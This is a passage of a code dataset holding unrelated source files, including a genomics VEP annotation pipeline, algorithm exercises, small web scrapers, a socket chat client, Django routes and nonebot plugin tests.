path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab) and not (file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\")):\n cmd = \"tabixgz \" + tab + \";\"\n print(cmd)\n proc_util.run_cmd(cmd)\n flag_sleep = True\n if flag_sleep:\n print('sleep 60')\n time.sleep(60)\n\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab) and file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\"):\n cmd = \"rm \" + tab + ''\n print(cmd)\n proc_util.run_cmd(cmd)\n\n\ndef s20_check_veptabgz(d1):\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\"):\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result \"\n cmd += \"-vcf \" + vcf + \".gz \"\n cmd += \"-vep_result \" + tab + \".gz \"\n print(cmd)\n print(proc_util.run_cmd(cmd))\n # break\n else:\n cntvar = 0\n for line in file_util.gzopen(vcf + '.gz'):\n line = line.decode('UTF-8')\n if line[0] != '#':\n cntvar += 1\n if cntvar == 0:\n cmd = \"rm \" + vcf + \"*\"\n print(cmd)\n proc_util.run_cmd(cmd)\n else:\n pass\n # print(cmd)\n # print(tab)\n\n\ndef s21_check_veptabgz2(d1):\n out = path + 
d1.replace('/', '_') + \".log.sh\"\n # file_util.fileSave(out, '', 'w')\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n tab = vcf + '.vep.tab'\n vep = vcf + '.vep.txt'\n if file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\") and file_util.is_exist(tab + \".gz.checked\"):\n pass\n else:\n cmd = \"rm \" + vcf + \".vep*;\"\n\n cmd += \"/home/mk446/bin/vep -i \" + vcf + \".gz -o \" + vep + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\"\n cmd += \"sleep 5;\"\n\n cmd += mutanno + \"convert -vep2tab -in \" + vep + \" -out \" + tab + \";\"\n # proc_util.run_cmd(cmd, True)\n # file_util.fileSave(out, vcf + '\\n', 'a')\n cmd += \"sleep 5;\"\n cmd += \"tabixgz \" + tab + \";\"\n cmd += \"sleep 5;\"\n cmd += mutanno + \"precal -check_vep_result -vep_result \" + tab + \".gz -vcf \" + vcf + \".gz;\"\n cmd += \"sleep 5;\"\n file_util.fileSave(out, cmd + '\\n', 'a')\n\n\ndef s22_rm_emptyvcf(d1):\n out = path + d1.replace('/', '_') + '.log.sh'\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n cnt = 0\n for line in file_util.gzopen(path + d1 + '/' + fname):\n line = line.decode('UTF-8')\n if line[0] != \"#\":\n cnt += 1\n if cnt > 2:\n break\n if cnt == 0:\n cmd = \"rm \" + path + d1 + '/' + fname[:-3] + '*;\\n'\n # print(cmd)\n file_util.fileSave(out, cmd, 'a')\n\n\ndef s23_merge_chrom(chrom):\n out = path + \"vep.hg38.\" + chrom + \".tsv\"\n # f = open(out, 'w')\n i = 0\n for k in range(300):\n vcfmap = {}\n for vcf in file_util.walk(path + \"chr\" + chrom + \"/\" + str(k) + \"/\", '.vcf.gz'):\n # print(vcf)\n k1 = int(vcf.split('/')[-1].split('_')[1])\n vcfmap[vcf] = k1\n # print(vcfmap)\n (ks, vs) = struct_util.sortdict(vcfmap)\n # print(ks)\n # print(vs)\n for vcf in ks:\n vep = vcf[:-3] + \".vep.tab.gz\"\n if i == 0:\n cmd = \"zcat \" + vep + \" > \" + out\n else:\n cmd = \"zcat \" + vep + \" | grep -v '^#' >> \" + out\n print(cmd)\n i += 1\n # break\n # f.close()\n cmd = \"sleep 20;\"\n print(cmd)\n cmd = \"tabixgz \" + out\n print(cmd)\n\n\ndef run_chrom():\n for chrom in seq_util.MAIN_CHROM_LIST:\n if chrom == \"MT\":\n chrom = \"M\"\n out = path + \"merge_\" + chrom + \".sh\"\n cmd = \"python \" + path + \"mv.py \" + chrom + \" > \" + out + \";\"\n cmd += \"sleep 20;\"\n cmd += \"mv \"+out+\" /home/mk446/jobs/.;\"\n print(cmd)\n\n\ndef s24_rm_intermediate_files(d1):\n out = path + d1.replace('/', '_') + '.log.sh'\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname[:-3]\n cmd = \"rm \" + vcf + \".vep.sh_summary.html;\"\n cmd += \"rm \" + vcf + \".vep.tab.gz.checked;\"\n cmd += \"rm \" + vcf + \".vep.txt.checked;\"\n cmd += \"rm \" + vcf + \".vep.txt.done;\"\n cmd += \"rm \" + vcf + \".vep.txt.gz;\"\n proc_util.run_cmd(cmd, True)\n\n\nif __name__ == \"__main__\":\n import proc_util\n import file_util\n import seq_util\n import struct_util\n fasta = \"/n/data1/hms/dbmi/park/SOFTWARE/REFERENCE/GRCh38d1/GRCh38_full_analysis_set_plus_decoy_hla.fa\"\n vepcache = \"/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/nonindexed_vep_cache/homo_sapiens_merged\"\n path = \"/home/mk446/mutanno/PRECALVEP/\"\n mutanno = \"python /home/mk446/mutanno/SRC/mutanno.py \"\n # 
run()\n # mv(sys.argv[1])\n # s11_check_undone(sys.argv[1])\n # s12_merge_checked()\n # s13_getvcflist(sys.argv[1])\n # s14_merge_vcflist()\n # s15_check_rerun()\n # s16_vcfgz()\n # s17_vep2tab()\n # s18_gz(sys.argv[1])\n # s19_vep2tab(sys.argv[1])\n # s20_check_veptabgz(sys.argv[1])\n # s21_check_veptabgz2(sys.argv[1])\n # s22_rm_emptyvcf(sys.argv[1])\n s23_merge_chrom(sys.argv[1])\n # run_chrom()\n # s24_rm_intermediate_files(sys.argv[1])\n","sub_path":"scripts/vep/mv2.py","file_name":"mv2.py","file_ext":"py","file_size_in_byte":15484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"409204778","text":"'''\n=> Sliding Window\nTime:O(n + m)\nSpace: O(m)\n'''\nclass Solution:\n \"\"\"\n @param source : A string\n @param target: A string\n @return: A string denote the minimum window, return \"\" if there is no such a string\n \"\"\"\n def minWindow(self, source , target):\n # write your code here\n if not source or not target:\n return ''\n \n unique_chars = len(set(target))\n target_chars_map = self.get_chars_map(target)\n \n right = 0\n unique_count = 0\n chars_map = {}\n res = []\n for left in range(len(source)):\n while right < len(source) and unique_count < unique_chars:\n if source[right] in target_chars_map:\n chars_map[source[right]] = chars_map.get(source[right], 0) + 1\n if chars_map[source[right]] == target_chars_map[source[right]]:\n unique_count += 1\n right += 1\n if unique_count == unique_chars:\n if not res or res[1] - res[0] > right - left:\n res = [left, right]\n if source[left] in target_chars_map:\n chars_map[source[left]] -= 1\n if chars_map[source[left]] < target_chars_map[source[left]]:\n unique_count -= 1\n \n return '' if not res else source[res[0]: res[1]]\n \n def get_chars_map(self, target):\n chars_map = {}\n \n for char in target:\n chars_map[char] = chars_map.get(char, 0) + 1\n \n return chars_map","sub_path":"32_minimum-window-substring/minimum-window-substring.py","file_name":"minimum-window-substring.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"388480823","text":"# Chapter 03 Laboratory\n# Course: Program Arcade Games with Python\n# Author: Leo Dube\n# Date: April 09, 2016\n\n# Quiz parameters\nquestions_tot = 3 # Total number of questions\nquestions_cor = 0 # Tracks correct answers\n\n# Quiz\n\n# Question 1\nans_1 = int(input(\"What is 3 * 3? > \"))\nif ans_1 == 9:\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\n# Question 2\nans_2 = input(\"\\nWhat is the derivative of x^2? > \")\nif ans_2 == \"2x\" or ans_2 == \"2*x\" or ans_2 == \"2 * x\":\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\n# Question 3\nans_3 = input(\"\\nWhat is Canada's PM's last name? > \")\nif ans_3.lower() == \"trudeau\":\n print(\"Correct!\")\n questions_cor += 1\nelse:\n print(\"Incorrect\")\n\nprint()\n\n# Recap\npercent = (questions_cor / questions_tot) * 100\n\nif percent >= 60:\n print(\"Congrats, you got \", percent, \" percent!\")\nelse:\n print(\"Sorry, you only got \", percent, \" percent.\")\n","sub_path":"lab03.py","file_name":"lab03.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"416142453","text":"# 이제 다시 파이썬으로 돌아와서,\n# 배열과 집합, 파일 읽고 쓰기를 (다시) 공부해보도록 하겠습니다.\n\n\n\n# 1. 
How to work with Python lists (arrays) and sets\n\n# Remove duplicate elements\narr1 = ['LTE', 'LTE', '5G', '5G', 'WCDMA', '5G', 'WCDMA', 'LTE']\narr2 = [1, 1, 2, 2, 3, 2, 3, 3]\nset1 = set(arr1)\nset2 = set(arr2)\narr1 = list(set1)\narr2 = list(set2)\nprint(arr1)\nprint(arr2)\n\n# Adding an element: a list adds with arr.append(el), a set with set.add(el)\n\n# Removing an element: discard(el) ignores a missing element, remove(el) raises an error for a missing element, pop(): returns the last element and then removes it, clear(): removes everything\n# How pop() behaves\nprint(arr2.pop()) # confirms \"returns the last element\"\nprint(arr2) # confirms \"removes the last element\"\n\n\n\n# 2. How to read and write files\n\n# A file is accessed with the open() function,\n# in the form \"file_object = open(filename, mode)\". *In these examples the file object is named f.\n# The open modes are read mode (r), write mode (w) and append mode (a).\n# Writing is done with f.write(string).\n# Finally, close the file with f.close().\n# Let's go through the examples one by one. *Uncomment them one at a time as you follow along.\n\n# Overwrite a file with a string: f.write(\"string\") w\nf = open(\"newFile.txt\", \"w\")\na = \"Hello Again Python!\"\nf.write(a)\nf.close()\n\n# Append a string to a file: f.write(\"string\") a\nf = open(\"newFile.txt\", \"a\")\na = \"Added Line!\"\nf.write(a)\nf.close()\n\n# Empty a file: f.write(\"\") w\nf = open(\"newFile.txt\", \"w\")\na = \"\"\nf.write(a)\nf.close()\n\n# Append a list to a file: 'delimiter'.join(arr) a\nf = open(\"newFile.txt\", \"a\")\nf.write('\\n'.join(arr1))\nf.close()\n\n# Append a list to a file as one line, without a delimiter: f.writelines(arr) a\nf = open(\"newFile.txt\", \"a\")\nf.write('\\n') # move down one row from the data above\nf.writelines(arr1) # writes WCDMA5GLTE\nf.close()\n\n# Reading a file 1 (returns the whole text as one string): f.read() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.read()\nf.close()\nprint(text)\n\n# Reading a file 2 (returns one line at a time): f.readline() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.readline()\nf.close()\nprint(text) # only the first line is returned\n# to print everything with f.readline(), use a while or for loop\nf = open(\"newFile.txt\", \"r\")\nwhile 1: # set up an infinite loop\n    a = f.readline()\n    if not a: # print until a comes back empty\n        break\n    print(a)\n\n# Reading a file 3 (returns the result as a list): f.readlines() r\nf = open(\"newFile.txt\", \"r\")\ntext = f.readlines()\nf.close()\nprint(text)\n","sub_path":"back_python_3_dataprocess1/1_python_matplotlib1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67392156","text":"# Visualization Util\n\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\nfrom utils.constants import *\n\n\ndef word_cloud_visulization(df_column, description, stopword=True):\n    \"\"\"\n    Word Cloud Visualization\n    :param df_column:\n    :param description:\n    :param stopword:\n    :return:\n    \"\"\"\n    comment_words = ''\n    stopwords = ''\n    if stopword:\n        stopwords = set(STOPWORDS)\n\n    # iterate through the csv file\n    for val in df_column:\n\n        # typecaste each val to string\n        val = str(val)\n\n        # split the value\n        tokens = val.split()\n\n        # Converts each token into lowercase\n        for i in range(len(tokens)):\n            tokens[i] = tokens[i].lower()\n\n        comment_words += \" \".join(tokens) + \" \"\n\n    wordcloud = WordCloud(width=300, height=300,\n                          background_color='white',\n                          stopwords=stopwords,\n                          min_font_size=10).generate(comment_words)\n\n    # plot the WordCloud image\n    plt.figure(figsize=(15, 15))\n    plt.title(\"WordCloud of {} column\".format(description), fontdict=TITLE_FONT)\n    plt.imshow(wordcloud, interpolation=\"bilinear\")\n    plt.axis(\"off\")\n    plt.show()\n","sub_path":"utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"529382524","text":"\"\"\"\n\n--- Exercise statement: N°22 - 
Walkie-Talkie\n\nWrite two programs that interact with each other as if they were peer-to-peer clients. They work as\nfollows:\n\nLet's call the first program to run Alice, and the second one Bob.\n\nAlice starts out listening for text from the other program.\n\nBob lets the user type a message on standard input. On pressing enter, that message is sent to Alice,\nwho shows it on screen. This step repeats until Bob sends a message with the text “cambio”. At that\nmoment Bob starts listening to the Alice process.\n\nWhen Alice receives the word “cambio”, she lets the user type text on the command line. On pressing enter the\nmessages travel to Bob, who shows them on screen. When Alice sends a “cambio” text, the sequence is inverted\nagain.\n\nWhen either of the two processes sends “exit”, both terminate.\n\nUse Inet Stream sockets to communicate the two processes.\n\ntag: walkie\n\n\"\"\"\n\nimport socket\nimport sys\nimport getopt\nimport time\n\n\ndef send(server_sock):\n    goodbye = \"over and out\"\n    while True:\n        msg = input(\"\\nMessage to Alice: \")\n        if msg.lower() == goodbye:\n            server_sock.send(msg.encode())\n            time.sleep(2)\n            break\n        else:\n            server_sock.send(msg.encode())\n    while True:\n        data = server_sock.recv(1024).decode()\n        if data.lower() != goodbye:\n            print(f\"\\n>>> Alice says: {data}\")\n        else:\n            print(f\"\\n>>> Alice says: {data}\")\n            time.sleep(2)\n            break\n\n\ndef walkie_talkie(server_socket):\n    while True:\n        send(server_socket)\n\n\nif __name__ == '__main__':\n\n    if len(sys.argv[1:]) <= 1:\n        print(\"Usage:\\n python3 exercise22_bob.py -p \")\n    else:\n        host = \"\"\n        port = 0\n\n        (option, value) = getopt.getopt(sys.argv[1:], \"p:\")\n        for (opt, val) in option:\n            if opt == \"-p\":\n                port = int(val)\n        try:\n            s_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        except socket.error:\n            print('Failed to create socket')\n            sys.exit()\n\n        s_socket.connect((host, port))\n\n        walkie_talkie(s_socket)\n","sub_path":"exercises/exercise22_bob.py","file_name":"exercise22_bob.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32932288","text":"import requests, bs4, re\n\nlogin = \"\"\nheslo = \"\"\njaskynaUrl = \"https://www.andor.cz/jeskyne/index.php?action=view&idJeskyne=18328\"\ntag = 'font color=\"gold\"' # the tag that will be searched for\n\nprispevkovNaStranku = 40 # default setting: how many posts per page you display in the cave\n\npouzitPostavu = False # True if you want to use a character\npostavaId = \"115493/*/18328\" # if you want to select a character\n\n\n\ndef vyberPostavu(session, postavaId):\n    postava = {\"idckoPostavy\": postavaId}\n\n    session.post(\"https://www.andor.cz/postava/switchpersons.php\", data=postava)\n\ndef main():\n    loginInfo = {\n        'jmeno': login,\n        'kodename': heslo\n    }\n    prispevky = []\n    goldPattern = re.compile(r'{}'.format(tag))\n\n\n    with requests.Session() as session:\n        res = session.post(\"https://www.andor.cz/login.php\", data=loginInfo)\n\n        if pouzitPostavu:\n            vyberPostavu(session, postavaId)\n\n        jeskyn = session.get(jaskynaUrl)\n        andor = bs4.BeautifulSoup(jeskyn.text, \"html.parser\")\n\n        getPrispevkyCountPattern = re.compile(r'(\\d+)')\n\n        prispevkyCount = int(re.search(getPrispevkyCountPattern, andor.find(\"div\", id=\"pocetPrispevku\").text).group(1))\n        print(\"Posts in total: \", prispevkyCount)\n\n        # print(andor.find(\"div\", id=\"formularPrispevek\"))\n\n        i = 0\n        while i * 
+{"seq_id":"32932288","text":"import requests, bs4, re\n\nlogin = \"\"\nheslo = \"\"\njaskynaUrl = \"https://www.andor.cz/jeskyne/index.php?action=view&idJeskyne=18328\"\ntag = 'font color=\"gold\"' # the tag that will be searched for\n\nprispevkovNaStranku = 40 # default setting for how many posts per page you display in the cave\n\npouzitPostavu = False # True if you want to use a character\npostavaId = \"115493/*/18328\" # if you want to select a character\n\n\n\ndef vyberPostavu(session, postavaId):\n postava = {\"idckoPostavy\": postavaId}\n\n session.post(\"https://www.andor.cz/postava/switchpersons.php\", data=postava)\n\ndef main():\n loginInfo = {\n 'jmeno': login,\n 'kodename': heslo\n }\n prispevky = []\n goldPattern = re.compile(r'{}'.format(tag))\n\n\n with requests.Session() as session:\n res = session.post(\"https://www.andor.cz/login.php\", data=loginInfo)\n\n if pouzitPostavu:\n vyberPostavu(session, postavaId)\n\n jeskyn = session.get(jaskynaUrl)\n andor = bs4.BeautifulSoup(jeskyn.text, \"html.parser\")\n\n getPrispevkyCountPattern = re.compile(r'(\\d+)')\n\n prispevkyCount = int(re.search(getPrispevkyCountPattern, andor.find(\"div\", id=\"pocetPrispevku\").text).group(1))\n print(\"Total posts: \", prispevkyCount)\n\n # print(andor.find(\"div\", id=\"formularPrispevek\"))\n\n i = 0\n while i * prispevkovNaStranku < prispevkyCount:\n\n strankaJeskyneUrl = jaskynaUrl + \"&from={}&page=1\".format(prispevkovNaStranku * i)\n strankaJeskyne = session.get(strankaJeskyneUrl)\n\n for prispevok in bs4.BeautifulSoup(strankaJeskyne.text, \"html.parser\").find_all(\"table\", class_=\"prispevek\" ):\n if re.search(goldPattern, str(prispevok)) is not None:\n prispevky.append(prispevok)\n\n i += 1\n\n print(\"Posts with the given tag: \", len(prispevky))\n\n with open(\"filtrovane_prispevky.html\", \"w\") as f:\n\n f.write(\"<html>\")\n\n with open(\"head.txt\") as head:\n f.writelines(head.readlines())\n\n\n f.write(\"<body>\")\n\n for prispevok in prispevky:\n f.write(str(prispevok))\n\n f.write(\"</body>\")\n\n f.write(\"</html>\")\n\n\nprint(\"Andor post downloader and filter\")\nprint(\"Nothing is guaranteed\")\nprint(\"Invalid input will probably crash the program\")\n\nmain()\n","sub_path":"postFilter/prispevkyGetter.py","file_name":"prispevkyGetter.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"602971119","text":"\"\"\"Proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom django.views.static import serve\n\nfrom Proj import settings\nfrom app1 import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('get_valid_image/', views.get_valid_image), # get the image CAPTCHA\n path('login/', views.login), # log in\n path('register/', views.register), # register\n path('index/', views.index), # home page\n path(\"updatecode/\",views.updatecode), # change password\n re_path(r'staff/(?P.*)$', views.staff),\n re_path(r'administrator/(?P.*)$', views.administrator),\n re_path(r'firm/(?P.*)$', views.firm),\n re_path(r'media/(?P<path>.*)$', serve, {\"document_root\": settings.MEDIA_ROOT}), # serve media resources\n # re_path(r'static/(?P<path>.*)$', serve, {\"document_root\": settings.STATIC_ROOT}), # serve static resources\n\n path('logout/', views.logout),\n path(\"introduce/\",views.introduce)\n\n]\n","sub_path":"Proj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"648970894","text":"\n\ndef computeMeanRating(filename):\n ratings = []\n\n try:\n f = open('../ml-latest-small/' + filename, 'r')\n except:\n print('File could not be read or found')\n raise\n finally:\n for line in f:\n columns = line.split(\",\")\n if columns[2] != \"rating\":\n ratings.append(float((columns[2])))\n\n f.close()\n\n n = len(ratings)\n # sorting for median\n ratings.sort()\n\n # calculating Arithmetic Mean\n mean = calcArithmeticMean(ratings, n)\n\n # calculating Median\n\n median = calcMedian(ratings, n)\n\n # calculating mode\n mode = calcMode(ratings)\n\n return mean, median, mode\n\ndef calcMode(ratings):\n #Creating a Map where the amount of each number will be stored\n numCount = {}\n highestNum = 0\n\n #Fill the Map with the numbers 
which appear in the List\n for i in ratings:\n #if the number already appears in the list count up\n if i in numCount.keys():\n numCount[i] += 1\n #else add the new number to the map\n else:\n numCount[i] = 1\n\n #check which number appears most often\n for i in numCount.keys():\n if numCount[i] > highestNum:\n highestNum = numCount[i]\n mode = i\n if highestNum != 1:\n return mode\n #case if every number only appears once\n elif highestNum == 1:\n print(\"All numbers in the list appear once.\")\n return -1\n\ndef calcMedian(ratings, n):\n\n # calculating the median\n if n % 2 != 0:\n median = ratings[int(n / 2)]\n else:\n # case when the len of the data is even.\n median = float((ratings[int((n - 1) / 2)] + ratings[int(n / 2)]) / 2.0)\n return median\n\ndef calcArithmeticMean(ratings, n):\n sum = 0\n for i in ratings:\n sum += i\n ## calculating arithmetic mean\n average = sum / n\n # round arithmetic to 5 digits\n average = round(average, 5)\n return average\n\n\nif __name__ == '__main__':\n print (computeMeanRating(\"ratings.csv\"))\n","sub_path":"assignment1/src/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"264852721","text":"from typing import Type, Optional\n\nimport pytest\nfrom nonebug import App\n\n\n@pytest.mark.asyncio\nasync def test_on(app: App, load_plugin):\n import nonebot\n import plugins.plugin.matchers as module\n from nonebot.typing import T_RuleChecker\n from nonebot.matcher import Matcher, matchers\n from nonebot.rule import (\n RegexRule,\n IsTypeRule,\n CommandRule,\n EndswithRule,\n KeywordsRule,\n FullmatchRule,\n StartswithRule,\n ShellCommandRule,\n )\n from plugins.plugin.matchers import (\n TestEvent,\n rule,\n state,\n handler,\n priority,\n matcher_on,\n permission,\n expire_time,\n matcher_on_type,\n matcher_sub_cmd,\n matcher_group_on,\n matcher_on_regex,\n matcher_on_notice,\n matcher_on_command,\n matcher_on_keyword,\n matcher_on_message,\n matcher_on_request,\n matcher_on_endswith,\n matcher_on_fullmatch,\n matcher_on_metaevent,\n matcher_group_on_type,\n matcher_on_startswith,\n matcher_sub_shell_cmd,\n matcher_group_on_regex,\n matcher_group_on_notice,\n matcher_group_on_command,\n matcher_group_on_keyword,\n matcher_group_on_message,\n matcher_group_on_request,\n matcher_on_shell_command,\n matcher_group_on_endswith,\n matcher_group_on_fullmatch,\n matcher_group_on_metaevent,\n matcher_group_on_startswith,\n matcher_group_on_shell_command,\n )\n\n plugin = nonebot.get_plugin(\"plugin\")\n\n def _check(\n matcher: Type[Matcher],\n pre_rule: Optional[T_RuleChecker],\n has_permission: bool,\n ):\n assert {dependent.call for dependent in matcher.rule.checkers} == (\n {pre_rule, rule} if pre_rule else {rule}\n )\n if has_permission:\n assert {dependent.call for dependent in matcher.permission.checkers} == {\n permission\n }\n else:\n assert not matcher.permission.checkers\n assert [dependent.call for dependent in matcher.handlers] == [handler]\n assert matcher.temp is True\n assert matcher.expire_time == expire_time\n assert matcher in matchers[priority]\n assert matcher.block is True\n assert matcher._default_state == state\n\n assert matcher.plugin is plugin\n assert matcher.module is module\n assert matcher.plugin_name == \"plugin\"\n assert matcher.module_name == \"plugins.plugin.matchers\"\n\n _check(matcher_on, None, True)\n _check(matcher_on_metaevent, None, False)\n _check(matcher_on_message, None, True)\n 
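The hand-rolled mean, median and mode in statistic.py above can be sanity-checked against Python's standard library; statistics.mode raised StatisticsError on a tie before Python 3.8, which matches the "all numbers appear once" branch of calcMode. A small self-contained check with made-up sample ratings:

import statistics

ratings = [4.0, 3.5, 4.0, 5.0, 2.5]

print(round(statistics.mean(ratings), 5))  # 3.8, rounded like calcArithmeticMean
print(statistics.median(ratings))          # 4.0; handles odd/even lengths internally
print(statistics.mode(ratings))            # 4.0; may raise StatisticsError on a tie pre-3.8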
_check(matcher_on_notice, None, False)\n _check(matcher_on_request, None, False)\n _check(matcher_on_startswith, StartswithRule((\"test\",)), True)\n _check(matcher_on_endswith, EndswithRule((\"test\",)), True)\n _check(matcher_on_fullmatch, FullmatchRule((\"test\",)), True)\n _check(matcher_on_keyword, KeywordsRule(\"test\"), True)\n _check(matcher_on_command, CommandRule([(\"test\",)]), True)\n _check(matcher_on_shell_command, ShellCommandRule([(\"test\",)], None), True)\n _check(matcher_on_regex, RegexRule(\"test\"), True)\n _check(matcher_on_type, IsTypeRule(TestEvent), True)\n _check(matcher_sub_cmd, CommandRule([(\"test\", \"sub\")]), True)\n _check(matcher_sub_shell_cmd, ShellCommandRule([(\"test\", \"sub\")], None), True)\n _check(matcher_group_on, None, True)\n _check(matcher_group_on_metaevent, None, False)\n _check(matcher_group_on_message, None, True)\n _check(matcher_group_on_notice, None, False)\n _check(matcher_group_on_request, None, False)\n _check(matcher_group_on_startswith, StartswithRule((\"test\",)), True)\n _check(matcher_group_on_endswith, EndswithRule((\"test\",)), True)\n _check(matcher_group_on_fullmatch, FullmatchRule((\"test\",)), True)\n _check(matcher_group_on_keyword, KeywordsRule(\"test\"), True)\n _check(matcher_group_on_command, CommandRule([(\"test\",)]), True)\n _check(matcher_group_on_shell_command, ShellCommandRule([(\"test\",)], None), True)\n _check(matcher_group_on_regex, RegexRule(\"test\"), True)\n _check(matcher_group_on_type, IsTypeRule(TestEvent), True)\n","sub_path":"tests/test_plugin/test_on.py","file_name":"test_on.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"570496013","text":"#!/usr/bin/env python3\nimport codecs\nf_input = open('data.txt','r')\n\n# FOR SMALL FILES:\ncount = len(f_input.readlines())\nf_input.seek(0)\n\n# IF THE FILE IS TOO LARGE:\n#count = -1\n#for count, line in enumerate(codecs.open('data.txt','rU','utf-8')):\n# pass\n#count += 1\n#print(count)\n\n# FOR WINDOWS FILES:\n#count = 0\n#input_file = codecs.open('data.txt','rb','utf-8')\n#while (True):\n# buffer = input_file.read(8192*1024)\n# if not buffer:\n# break\n# count += buffer.count('\\n')\n#count += 1\n#input_file.close()\n#print(count)\n","sub_path":"calc_lines.py","file_name":"calc_lines.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"58848460","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nimport itertools\nimport string\nimport csv\n\ncategories = [\n 'russia', \n 'world', \n 'economics', \n 'forces', \n 'science', \n 'culture', \n 'sport', \n 'media', \n 'travel'\n ]\n\ndef get_html(url):\n html_links = {}\n for category in categories:\n url1 = url+'/rubrics/'+category\n print(url1)\n html_page_link = requests.get(url1)\n print('debug2')\n html_page = html_page_link.text\n soup = BeautifulSoup(html_page, 'html.parser')\n print('debug3')\n all_news = soup.find_all('div', class_='item')\n print('debug4')\n links = []\n for new in all_news[0:9]:\n url2 = new.a.get('href')\n links.append(url+url2)\n html_links[category] = links\n return html_links\n\ndef get_lenta_news(link):\n html_single_new_page = requests.get(link).text\n soup = BeautifulSoup(html_single_new_page, 'html.parser')\n all_news = soup.find_all('p')\n news_words_list = []\n for new in all_news:\n s = str(new.text).lower()\n a1 = 
s.translate(str.maketrans('', '', r\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~»«0123456789—\"\"\")).split()\n for element in a1:\n news_words_list.append(element)\n return news_words_list\n\nhtml1 = get_html(\"https://lenta.ru\")\n\nfor category, links in html1.items():\n name_file = category+'.csv'\n # print(name_file)\n category_words_list = []\n for link in links:\n words_in_text = get_lenta_news(link)\n category_words_list.extend(words_in_text)\n # print(category_words_list)\n category_words_list_iterabled = list(itertools.chain(category_words_list))\n # print(category_words_list_iterabled)\n counts = Counter(category_words_list)\n counts_20_max = counts.most_common(20)\n # print(category, counts_20_max)\n \n with open(name_file, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(counts_20_max)\n\n\n \n \n ","sub_path":"lenta.py","file_name":"lenta.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"543250528","text":"import heapq\n\ndef solution(scoville, K):\n answer = 0\n num = 0\n heapq.heapify(scoville)\n while (scoville[0] 页数\n :param page_size: 一页返回多少条记录\n :param order: 排序\n :param ignores: 忽略的字段\n :param kwargs: title/url/admin/client_ip/log_type/error/start_time/end_time\n log_type 默认 0; error 默认 -1, start_time/end_time 格式yyyy-mm-dd\n '''\n query = 